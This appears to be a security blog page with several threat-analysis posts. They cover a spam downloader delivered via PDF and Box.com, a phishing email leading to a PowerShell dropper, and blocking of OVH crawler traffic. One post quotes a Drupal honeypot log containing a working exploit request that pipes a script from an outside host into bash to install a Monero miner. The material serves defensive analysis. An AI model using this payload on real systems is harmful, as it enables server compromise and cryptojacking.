We follow the trail of another spam e-mail. It’s delivering a malware downloader that’s 0/63 on Virustotal, not unheard of these days. The e-mail had a PDF attachment SWIFT-MT103.pdf which itself was innocuous and simply displayed a fuzzy scan image, purportedly a SWIFT request that linked to a file hosted on Box.com.
Tactics of the downloader/dropper:
Contains functionality for read data from the clipboard
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Detected TCP or UDP traffic on non-standard ports
Sample file is different than original file name gathered from version info
Internet Provider seen in connection with other malware
Icon mismatch, PE includes an icon from a different legit application
Reads the hosts file
…and many other warning signs shown by the software in deeper debugging in included in the report.
Received: from vps39646.inmotionhosting.com (vps39646.inmotionhosting.com
Date: Tue, 12 Jun 2018 01:42:52 +0000
A copy of the original e-mail received to a honeypot spam account:
Download the attached PDF, and examine it finding a link:
Download the file from a box.com link, and unzip the contents:
Analysis on the dropper downloaded from this link:
We found an interesting hack using a Drupal 7.56 honeypot. The attacker used a specially crafted URL to pull down a jpeg image, which turned out to be a script. The script connects to a Monero mining pool, and starts mining crypto from the server automatically. Vulnerability used is via Curl in this version of Drupal.
Here’s all of the traffic from the attacker:
22.214.171.124 - - [24/Apr/2018:01:34:08 +0000] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 403 36607 "-" "Ruby" 126.96.36.199 - - [24/Apr/2018:02:00:41 +0000] "POST //?q=user/password&name[%23post_render]=system&name[%23markup]=curl%20-s%20http://gmicameroon.com/logo7.jpg%20%7C%20bash%20-s&name[%23type]=markup HTTP/1.1" 200 21915 "-" "Ruby" 188.8.131.52 - - [24/Apr/2018:02:00:42 +0000] "POST /?q=file/ajax/name/%23value/form-RR2WlQ5bBKZlJcllzKJ16U3bf-IU_aIP8ALAzixqPZw HTTP/1.1" 200 1931 "-" "Ruby"
The file logo7.jpg pulled down from gmicameroon.com site is a script that runs the miner in /var/tmp/suppoie running as www-data on the device:
It all started with an e-mail from NYU: Received: from mx5.nyu.edu (MX5.NYU.EDU [184.108.40.206])
"From: xxxx xxxx <firstname.lastname@example.org> Sent: Monday, April 2, 2018 9:36 AM To: Infostruction Subject: ACH Payment Advice Good Afternoon, Please double check the payment for April 02, I have attached the WIRE. Invoice 98914 was paid on 04.01.2018. I want to make sure we are both on the same page. hxxp://agridron.com/INVOICE/GH-622577/ Thank you for your business! xxxxx xxxx"
We analyzed the malicious document this website (220.127.116.11) dropped:
SHA-256 f12642b8eb36637abaa85adbd559d056c36e2e013ca8f429236cd1fe0609c56a File name WIRE-FORM-DA-280819104.doc 17 engines detected this file VBA.Trojan-Downloader.Agent.cpw File names included WIRE-FORM-DA-280819104.doc, and ACH-FORM-GMU-89664246207.doc. As you may already know, these will change randomly. The doc launched cmd.exe, which launched powershell with an obfuscated script. It drops C:\Users\Public\183480.exe, file connects to frameyourdreams.in, IP 18.104.22.168:443 (WEDOS-HOSTING CZ), 22.214.171.124:80 (Online SAS), 126.96.36.199:8080, and 188.8.131.52:4143 (OVH Hosting, Inc.).… Read the article
*** Update – 4/6/2018 – We’ve received 125,027 connections from this provider since the blog was posted. A block by ARIN name helps us cover more space, so OVH Hosting, Inc, and OVH SAS are completely blocked from our websites.
Why do Canadians love the Infostruction blog so much? This is a question I set out to answer after looking at our Web Application Firewall (WAF) logs over the past 48-hours, and beyond. I’ve got 60k connections from 39 different IPs that belong to OVH Hosting Inc, all hailing from Canada. I let them know about this issue back when it started, and blocked all of the networks owned by this company. Since then, it’s been a constant flood of connections from OVH, and no response from the security/abuse team. I don’t expect one, so I’m writing here to warn you, if you see a large amount of connections, we recommend blocking the IPs below at a minimum. The real problem comes with the volume, and the fact that they are relentless, never stopping to rest. These connections come 24x7x365, and look like some sort of crawler, or scraper. The issue is they do not present a legitimate useragent for that kind of bot, and so we have no idea why they are accessing all of the content repeatedly, for days on end.… Read the article